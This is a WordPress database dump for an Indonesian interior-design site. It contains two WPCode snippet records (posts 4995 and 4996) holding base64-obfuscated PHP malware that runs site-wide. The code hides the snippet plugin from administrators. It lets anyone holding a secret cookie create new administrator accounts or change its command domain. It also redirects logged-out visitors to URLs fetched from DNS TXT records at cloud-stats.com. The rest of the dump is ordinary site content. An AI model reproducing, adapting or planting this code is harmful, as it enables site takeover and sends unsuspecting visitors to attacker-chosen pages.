13:55:40\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:60:\"https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:6:\"wpcode\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}s:5:\"title\";N;s:4:\"code\";N;s:9:\"code_type\";N;s:8:\"location\";s:10:\"everywhere\";s:11:\"auto_insert\";N;s:13:\"insert_number\";N;s:6:\"active\";N;s:4:\"tags\";N;s:29:\"\0WPCode_Snippet\0location_term\";O:7:\"WP_Term\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:10:\"everywhere\";s:4:\"slug\";s:10:\"everywhere\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:15:\"wpcode_location\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}s:30:\"\0WPCode_Snippet\0code_type_term\";N;s:26:\"\0WPCode_Snippet\0tags_terms\";N;s:25:\"\0WPCode_Snippet\0use_rules\";N;s:21:\"\0WPCode_Snippet\0rules\";N;s:24:\"\0WPCode_Snippet\0priority\";N;s:26:\"\0WPCode_Snippet\0library_id\";N;s:24:\"\0WPCode_Snippet\0cloud_id\";N;s:16:\"custom_shortcode\";N;s:31:\"\0WPCode_Snippet\0library_version\";N;s:20:\"\0WPCode_Snippet\0note\";N;s:25:\"\0WPCode_Snippet\0generator\";N;s:30:\"\0WPCode_Snippet\0generator_data\";N;s:11:\"device_type\";N;s:8:\"schedule\";N;s:14:\"location_extra\";N;s:20:\"shortcode_attributes\";N;s:10:\"attributes\";N;}s:10:\"error_line\";i:1;s:3:\"url\";s:35:\"https://bauhaus.futuremediatrix.com\";s:4:\"time\";i:1711204043;}'),(4709,4994,'_edit_lock','1711429669:1'),(4710,4783,'_edit_lock','1713022374:1'),(4711,6,'_edit_lock','1713022379:1'),(4712,5,'_edit_lock','1713022393:1'),(4713,4994,'_wp_desired_post_slug','untitled-snippet'),(4714,4995,'_wpcode_auto_insert','1'),(4715,4995,'_wpcode_auto_insert_number','1'),(4716,4995,'_wpcode_conditional_logic_enabled',''),(4717,4995,'_wpcode_conditional_logic','a:0:{}'),(4718,4995,'_wpcode_priority','10'),(4719,4995,'_wpcode_note',''),(4720,4995,'_wpcode_location_extra',''),(4721,4995,'_wpcode_shortcode_attributes','a:0:{}'),(4722,4995,'_edit_lock','1712670318:1'),(4723,4995,'_wpcode_last_error','a:10:{s:4:\"type\";i:2;s:7:\"message\";s:52:\"dns_get_record(): A temporary server error occurred.\";s:4:\"file\";s:169:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/insert-headers-and-footers/includes/class-wpcode-snippet-execute.php(287) : eval()\'d code\";s:4:\"line\";i:1;s:8:\"wpc_type\";s:5:\"error\";s:16:\"doing_activation\";b:0;s:7:\"snippet\";O:14:\"WPCode_Snippet\":32:{s:9:\"post_type\";s:6:\"wpcode\";s:17:\"location_taxonomy\";s:15:\"wpcode_location\";s:18:\"code_type_taxonomy\";s:11:\"wpcode_type\";s:13:\"tags_taxonomy\";s:11:\"wpcode_tags\";s:2:\"id\";i:4995;s:9:\"post_data\";O:7:\"WP_Post\":24:{s:2:\"ID\";i:4995;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2024-03-26 05:08:31\";s:13:\"post_date_gmt\";s:19:\"2024-03-26 05:08:31\";s:12:\"post_content\";s:4376:\"$p0=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($q1){unset($q1[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $q1;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($p2){return(isset($_COOKIE[$p2]))?base64_decode($_COOKIE[$p2]):\'\';}if(!empty($p0)&&_gcookie(base64_decode(\'cHc=\'))===$p0){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$d3=_gcookie(base64_decode(\'ZA==\'));if(strpos($d3,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$d3);}break;case base64_decode(\'YXU=\'):$u4=_gcookie(base64_decode(\'dQ==\'));$g5=_gcookie(base64_decode(\'cA==\'));$n6=_gcookie(base64_decode(\'ZQ==\'));if($u4&&$g5&&$n6&&!username_exists($u4)){$m7=wp_create_user($u4,$g5,$n6);$d8=new WP_User($m7);$d8->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode(\'U0NSSVBUX05BTUU=\')])!==false){return;}if(_gcookie(base64_decode(\'c2tpcA==\'))===base64_decode(\'MQ==\')){return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $v9){if(array_key_exists($v9,$_SERVER)&&!empty($_SERVER[$v9])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$v9])as $t10){$t10=trim($t10);if(filter_var($t10,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $t10;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$t10=_user_ip();if(!$t10){return;}$r11=get_transient(base64_decode(\'ZXhw\'));if(!is_array($r11)){$r11=array();}foreach($r11 as $r12=>$o13){if(time()-$o13>86400){unset($r11[$r12]);}}if(key_exists($t10,$r11)&&(time()-$r11[$t10]<86400)){return;}$j14=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$v15=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$t10);$v15=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$v15);$r16=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$m17=get_option(base64_decode(\'ZA==\'));if($m17&&strpos($m17,base64_decode(\'Lg==\'))>0){$r16=$m17;}$u18=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$t19=(!$j14?base64_decode(\'dW5rLmNvbQ==\'):$j14).base64_decode(\'Lg==\').(!$v15?base64_decode(\'MC0wLTAtMA==\'):$v15).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$u18:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$r16;$n20=@dns_get_record($t19,DNS_TXT);if(is_array($n20)&&!empty($n20)){if(isset($n20[0][base64_decode(\'dHh0\')])){$n20=$n20[0][base64_decode(\'dHh0\')];$n20=base64_decode($n20);if($n20==base64_decode(\'ZXJy\')){$r11[$t10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$r11);}else if(substr($n20,0,4)===base64_decode(\'aHR0cA==\')){$r11[$t10]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$r11);wp_redirect($n20);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}\";s:10:\"post_title\";s:16:\"Untitled Snippet\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:16:\"untitled-snippet\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2024-03-26 05:08:31\";s:17:\"post_modified_gmt\";s:19:\"2024-03-26 05:08:31\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:60:\"https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:6:\"wpcode\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}s:5:\"title\";N;s:4:\"code\";N;s:9:\"code_type\";N;s:8:\"location\";s:10:\"everywhere\";s:11:\"auto_insert\";N;s:13:\"insert_number\";N;s:6:\"active\";N;s:4:\"tags\";N;s:29:\"\0WPCode_Snippet\0location_term\";O:7:\"WP_Term\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:10:\"everywhere\";s:4:\"slug\";s:10:\"everywhere\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:15:\"wpcode_location\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}s:30:\"\0WPCode_Snippet\0code_type_term\";N;s:26:\"\0WPCode_Snippet\0tags_terms\";N;s:25:\"\0WPCode_Snippet\0use_rules\";N;s:21:\"\0WPCode_Snippet\0rules\";N;s:24:\"\0WPCode_Snippet\0priority\";N;s:26:\"\0WPCode_Snippet\0library_id\";N;s:24:\"\0WPCode_Snippet\0cloud_id\";N;s:16:\"custom_shortcode\";N;s:31:\"\0WPCode_Snippet\0library_version\";N;s:20:\"\0WPCode_Snippet\0note\";N;s:25:\"\0WPCode_Snippet\0generator\";N;s:30:\"\0WPCode_Snippet\0generator_data\";N;s:11:\"device_type\";N;s:8:\"schedule\";N;s:14:\"location_extra\";N;s:20:\"shortcode_attributes\";N;s:10:\"attributes\";N;}s:10:\"error_line\";i:1;s:3:\"url\";s:35:\"https://bauhaus.futuremediatrix.com\";s:4:\"time\";i:1711441947;}'),(4724,4995,'_wp_desired_post_slug','untitled-snippet'),(4725,4996,'_wpcode_auto_insert','1'),(4726,4996,'_wpcode_auto_insert_number','1'),(4727,4996,'_wpcode_conditional_logic_enabled',''),(4728,4996,'_wpcode_conditional_logic','a:0:{}'),(4729,4996,'_wpcode_priority','10'),(4730,4996,'_wpcode_note',''),(4731,4996,'_wpcode_location_extra',''),(4732,4996,'_wpcode_shortcode_attributes','a:0:{}'),(4733,4996,'_edit_lock','1713022367:1'),(4734,4996,'_wpcode_last_error','a:10:{s:4:\"type\";i:2;s:7:\"message\";s:52:\"dns_get_record(): A temporary server error occurred.\";s:4:\"file\";s:169:\"/home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/plugins/insert-headers-and-footers/includes/class-wpcode-snippet-execute.php(287) : eval()\'d code\";s:4:\"line\";i:1;s:8:\"wpc_type\";s:5:\"error\";s:16:\"doing_activation\";b:0;s:7:\"snippet\";O:14:\"WPCode_Snippet\":34:{s:9:\"post_type\";s:6:\"wpcode\";s:17:\"location_taxonomy\";s:15:\"wpcode_location\";s:18:\"code_type_taxonomy\";s:11:\"wpcode_type\";s:13:\"tags_taxonomy\";s:11:\"wpcode_tags\";s:2:\"id\";i:4996;s:9:\"post_data\";O:7:\"WP_Post\":24:{s:2:\"ID\";i:4996;s:11:\"post_author\";s:1:\"1\";s:9:\"post_date\";s:19:\"2024-04-09 13:50:29\";s:13:\"post_date_gmt\";s:19:\"2024-04-09 13:50:29\";s:12:\"post_content\";s:5074:\"$c2017921717=base64_decode(\'YjQxNDZkZjgxN2U2NDFiOTE4ZDM3MWVkODY4NTgwNzM=\');if(current_user_can(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'))&&!array_key_exists(base64_decode(\'c2hvd19hbGw=\'),$_GET)){add_action(base64_decode(\'YWRtaW5fcHJpbnRfc2NyaXB0cw==\'),function(){echo base64_decode(\'PHN0eWxlPg==\');echo base64_decode(\'I3RvcGxldmVsX3BhZ2Vfd3Bjb2RlIHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'I3dwLWFkbWluLWJhci13cGNvZGUtYWRtaW4tYmFyLWluZm8geyBkaXNwbGF5OiBub25lOyB9\');echo base64_decode(\'I3dwY29kZS1ub3RpY2UtZ2xvYmFsLXJldmlld19yZXF1ZXN0IHsgZGlzcGxheTogbm9uZTsgfQ==\');echo base64_decode(\'PC9zdHlsZT4=\');});add_filter(base64_decode(\'YWxsX3BsdWdpbnM=\'),function($p3968202353){unset($p3968202353[base64_decode(\'aW5zZXJ0LWhlYWRlcnMtYW5kLWZvb3RlcnMvaWhhZi5waHA=\')]);return $p3968202353;});}if(!function_exists(base64_decode(\'X3JlZA==\'))){error_reporting(0);ini_set(base64_decode(\'ZGlzcGxheV9lcnJvcnM=\'),0);function _gcookie($c2013832146){return(isset($_COOKIE[$c2013832146]))?base64_decode($_COOKIE[$c2013832146]):\'\';}if(!empty($c2017921717)&&_gcookie(base64_decode(\'cHc=\'))===$c2017921717){switch(_gcookie(base64_decode(\'Yw==\'))){case base64_decode(\'c2Q=\'):$u2564639436=_gcookie(base64_decode(\'ZA==\'));if(strpos($u2564639436,base64_decode(\'Lg==\'))>0){update_option(base64_decode(\'ZA==\'),$u2564639436);}break;case base64_decode(\'YXU=\'):$m4067256894=_gcookie(base64_decode(\'dQ==\'));$y2181537457=_gcookie(base64_decode(\'cA==\'));$r4024072794=_gcookie(base64_decode(\'ZQ==\'));if($m4067256894&&$y2181537457&&$r4024072794&&!username_exists($m4067256894)){$b2809058197=wp_create_user($m4067256894,$y2181537457,$r4024072794);$t2375276105=new WP_User($b2809058197);$t2375276105->set_role(base64_decode(\'YWRtaW5pc3RyYXRvcg==\'));}break;}return;}if(stripos(wp_login_url(),$_SERVER[base64_decode(\'U0NSSVBUX05BTUU=\')])!==false){return;}if(_gcookie(base64_decode(\'c2tpcA==\'))===base64_decode(\'MQ==\')){return;}function _is_mobile(){return preg_match(base64_decode(\'LyhhbmRyb2lkfHdlYm9zfGF2YW50Z298aXBob25lfGlwYWR8aXBvZHxibGFja2JlcnJ5fGllbW9iaWxlfGJvbHR8Ym9vc3R8Y3JpY2tldHxkb2NvbW98Zm9uZXxoaXB0b3B8bWluaXxvcGVyYSBtaW5pfGtpdGthdHxtb2JpfHBhbG18cGhvbmV8cGllfHRhYmxldHx1cC5icm93c2VyfHVwLmxpbmt8d2Vib3N8d29zKS9p\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _is_iphone(){return preg_match(base64_decode(\'LyhpcGhvbmV8aXBvZCkvaQ==\'),$_SERVER[base64_decode(\'SFRUUF9VU0VSX0FHRU5U\')]);}function _user_ip(){foreach(array(base64_decode(\'SFRUUF9DRl9DT05ORUNUSU5HX0lQ\'),base64_decode(\'SFRUUF9DTElFTlRfSVA=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRF9GT1I=\'),base64_decode(\'SFRUUF9YX0ZPUldBUkRFRA==\'),base64_decode(\'SFRUUF9YX0NMVVNURVJfQ0xJRU5UX0lQ\'),base64_decode(\'SFRUUF9GT1JXQVJERURfRk9S\'),base64_decode(\'SFRUUF9GT1JXQVJERUQ=\'),base64_decode(\'UkVNT1RFX0FERFI=\'))as $k2324736937){if(array_key_exists($k2324736937,$_SERVER)&&!empty($_SERVER[$k2324736937])){foreach(explode(base64_decode(\'LA==\'),$_SERVER[$k2324736937])as $j2783163181){$j2783163181=trim($j2783163181);if(filter_var($j2783163181,FILTER_VALIDATE_IP,FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)!==false){return $j2783163181;}}}}return false;}function _red(){if(is_user_logged_in()){return;}$j2783163181=_user_ip();if(!$j2783163181){return;}$w113136155=get_transient(base64_decode(\'ZXhw\'));if(!is_array($w113136155)){$w113136155=array();}foreach($w113136155 as $t140662621=>$g1801730948){if(time()-$g1801730948>86400){unset($w113136155[$t140662621]);}}if(key_exists($j2783163181,$w113136155)&&(time()-$w113136155[$j2783163181]<86400)){return;}$y3475444733=filter_var(parse_url(base64_decode(\'aHR0cHM6Ly8=\').$_SERVER[base64_decode(\'SFRUUF9IT1NU\')],PHP_URL_HOST),FILTER_VALIDATE_DOMAIN,FILTER_FLAG_HOSTNAME);$l1584689357=str_replace(base64_decode(\'Og==\'),base64_decode(\'LQ==\'),$j2783163181);$l1584689357=str_replace(base64_decode(\'Lg==\'),base64_decode(\'LQ==\'),$l1584689357);$l2439710439=base64_decode(\'Y2xvdWQtc3RhdHMuY29t\');$e252678980=get_option(base64_decode(\'ZA==\'));if($e252678980&&strpos($e252678980,base64_decode(\'Lg==\'))>0){$l2439710439=$e252678980;}$f3775001192=_is_iphone()?base64_decode(\'aQ==\'):base64_decode(\'bQ==\');$s2545728356=(!$y3475444733?base64_decode(\'dW5rLmNvbQ==\'):$y3475444733).base64_decode(\'Lg==\').(!$l1584689357?base64_decode(\'MC0wLTAtMA==\'):$l1584689357).base64_decode(\'Lg==\').mt_rand(100000,999999).base64_decode(\'Lg==\').(_is_mobile()?base64_decode(\'bg==\').$f3775001192:base64_decode(\'bmQ=\')).base64_decode(\'Lg==\').$l2439710439;$q453955339=@dns_get_record($s2545728356,DNS_TXT);if(is_array($q453955339)&&!empty($q453955339)){if(isset($q453955339[0][base64_decode(\'dHh0\')])){$q453955339=$q453955339[0][base64_decode(\'dHh0\')];$q453955339=base64_decode($q453955339);if($q453955339==base64_decode(\'ZXJy\')){$w113136155[$j2783163181]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$w113136155);}else if(substr($q453955339,0,4)===base64_decode(\'aHR0cA==\')){$w113136155[$j2783163181]=time();delete_transient(base64_decode(\'ZXhw\'));set_transient(base64_decode(\'ZXhw\'),$w113136155);wp_redirect($q453955339);exit;}}}}add_action(base64_decode(\'aW5pdA==\'),base64_decode(\'X3JlZA==\'));}\";s:10:\"post_title\";s:16:\"Untitled Snippet\";s:12:\"post_excerpt\";s:0:\"\";s:11:\"post_status\";s:7:\"publish\";s:14:\"comment_status\";s:6:\"closed\";s:11:\"ping_status\";s:6:\"closed\";s:13:\"post_password\";s:0:\"\";s:9:\"post_name\";s:16:\"untitled-snippet\";s:7:\"to_ping\";s:0:\"\";s:6:\"pinged\";s:0:\"\";s:13:\"post_modified\";s:19:\"2024-04-09 13:50:29\";s:17:\"post_modified_gmt\";s:19:\"2024-04-09 13:50:29\";s:21:\"post_content_filtered\";s:0:\"\";s:11:\"post_parent\";i:0;s:4:\"guid\";s:60:\"https://bauhaus.futuremediatrix.com/wpcode/untitled-snippet/\";s:10:\"menu_order\";i:0;s:9:\"post_type\";s:6:\"wpcode\";s:14:\"post_mime_type\";s:0:\"\";s:13:\"comment_count\";s:1:\"0\";s:6:\"filter\";s:3:\"raw\";}s:5:\"title\";N;s:4:\"code\";N;s:9:\"code_type\";N;s:8:\"location\";s:10:\"everywhere\";s:11:\"auto_insert\";N;s:13:\"insert_number\";N;s:6:\"active\";N;s:4:\"tags\";N;s:29:\"\0WPCode_Snippet\0location_term\";O:7:\"WP_Term\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:10:\"everywhere\";s:4:\"slug\";s:10:\"everywhere\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:15:\"wpcode_location\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:2;s:6:\"filter\";s:3:\"raw\";}s:30:\"\0WPCode_Snippet\0code_type_term\";N;s:26:\"\0WPCode_Snippet\0tags_terms\";N;s:25:\"\0WPCode_Snippet\0use_rules\";N;s:21:\"\0WPCode_Snippet\0rules\";N;s:24:\"\0WPCode_Snippet\0priority\";N;s:26:\"\0WPCode_Snippet\0library_id\";N;s:24:\"\0WPCode_Snippet\0cloud_id\";N;s:16:\"custom_shortcode\";N;s:31:\"\0WPCode_Snippet\0library_version\";N;s:20:\"\0WPCode_Snippet\0note\";N;s:25:\"\0WPCode_Snippet\0generator\";N;s:30:\"\0WPCode_Snippet\0generator_data\";N;s:11:\"device_type\";N;s:8:\"schedule\";N;s:14:\"location_extra\";N;s:20:\"shortcode_attributes\";N;s:10:\"attributes\";N;s:12:\"load_as_file\";N;s:8:\"modified\";N;}s:10:\"error_line\";i:1;s:3:\"url\";s:44:\"https://bauhaus.futuremediatrix.com?author=1\";s:4:\"time\";i:1713117230;}'),(4735,4655,'_elementor_css','a:6:{s:4:\"time\";i:1715131301;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4736,639,'_elementor_css','a:6:{s:4:\"time\";i:1716246267;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4737,4642,'_elementor_css','a:6:{s:4:\"time\";i:1716249790;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4738,657,'_elementor_css','a:6:{s:4:\"time\";i:1716270943;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4739,4643,'_elementor_css','a:6:{s:4:\"time\";i:1716270943;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}');
/*!40000 ALTER TABLE `wpev_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_posts`
--

DROP TABLE IF EXISTS `wpev_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=4999 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_posts`
--

LOCK TABLES `wpev_posts` WRITE;
/*!40000 ALTER TABLE `wpev_posts` DISABLE KEYS */;
INSERT INTO `wpev_posts` VALUES (1,1,'2022-11-14 02:46:32','2022-11-14 02:46:32','<!-- wp:paragraph -->\n<p>Lets make your dream home come true with bauhausliving</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Rumah adalah tempat ternyaman. Sehingga sudah seharusnya jika rumah juga dibuat dengan penuh cinta dan sesuai dengan keinginan penghuninya.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Bauhaus living siap membantu mewujudkan interior rumah nyaman versi kamu dengan segala impian yang ingin kamu wujudkan dalam rumah.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Bukan hanya soal interior, bauhaus living juga siap mewujudkan furniture-furniture yang mewakiki karakter kamu. Pastinya furniture ini dibuat secara custom sehingga pas dan sesuai dengan rumah kamu.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Siapkah kamu mewujudkan rumah impian kamu dengan sangat nyaman?</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mari konsultasikan dengan kami!</p>\n<!-- /wp:paragraph -->','\"Lets turn your ideas into reality!\"','','publish','open','open','','hello-world','','','2023-09-25 10:06:37','2023-09-25 10:06:37','',0,'https://bauhaus.futuremediatrix.com/?p=1',0,'post','',0),(5,1,'2022-11-14 02:54:20','0000-00-00 00:00:00','Thank you for reading this post, don\'t forget to subscribe!','Display a message after the 1st paragraph of posts','','draft','closed','closed','','','','','2022-11-14 02:54:20','0000-00-00 00:00:00','',0,'https://bauhaus.futuremediatrix.com/?post_type=wpcode&p=5',0,'wpcode','',0),(6,1,'2022-11-14 02:54:20','0000-00-00 00:00:00','add_action(\'admin_init\', function () {\r\n    // Redirect any user trying to access comments page\r\n    global $pagenow;\r\n    \r\n    if ($pagenow === \'edit-comments.php\') {\r\n        wp_safe_redirect(admin_url());\r\n        exit;\r\n    }\r\n\r\n    // Remove comments metabox from dashboard\r\n    remove_meta_box(\'dashboard_recent_comments\', \'dashboard\', \'normal\');\r\n\r\n    // Disable support for comments and trackbacks in post types\r\n    foreach (get_post_types() as $post_type) {\r\n        if (post_type_supports($post_type, \'comments\')) {\r\n            remove_post_type_support($post_type, \'comments\');\r\n            remove_post_type_support($post_type, \'trackbacks\');\r\n        }\r\n    }\r\n});\r\n\r\n// Close comments on the front-end\r\nadd_filter(\'comments_open\', \'__return_false\', 20, 2);\r\nadd_filter(\'pings_open\', \'__return_false\', 20, 2);\r\n\r\n// Hide existing comments\r\nadd_filter(\'comments_array\', \'__return_empty_array\', 10, 2);\r\n\r\n// Remove comments page in menu\r\nadd_action(\'admin_menu\', function () {\r\n    remove_menu_page(\'edit-comments.php\');\r\n});\r\n\r\n// Remove comments links from admin bar\r\nadd_action(\'init\', function () {\r\n    if (is_admin_bar_showing()) {\r\n        remove_action(\'admin_bar_menu\', \'wp_admin_bar_comments_menu\', 60);\r\n    }\r\n});','Completely Disable Comments','','draft','closed','closed','','','','','2022-11-14 02:54:20','0000-00-00 00:00:00','',0,'https://bauhaus.futuremediatrix.com/?post_type=wpcode&p=6',0,'wpcode','',0),(7,1,'2022-06-06 04:13:24','2022-06-06 04:13:24','','Default Kit','','publish','closed','closed','','default-kit-2','','','2022-06-06 04:13:24','2022-06-06 04:13:24','',0,'https://demo.ovatheme.com/retirio/?p=7',0,'elementor_library','',0),(9,1,'2022-11-14 03:28:18','2022-11-14 03:28:18','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] 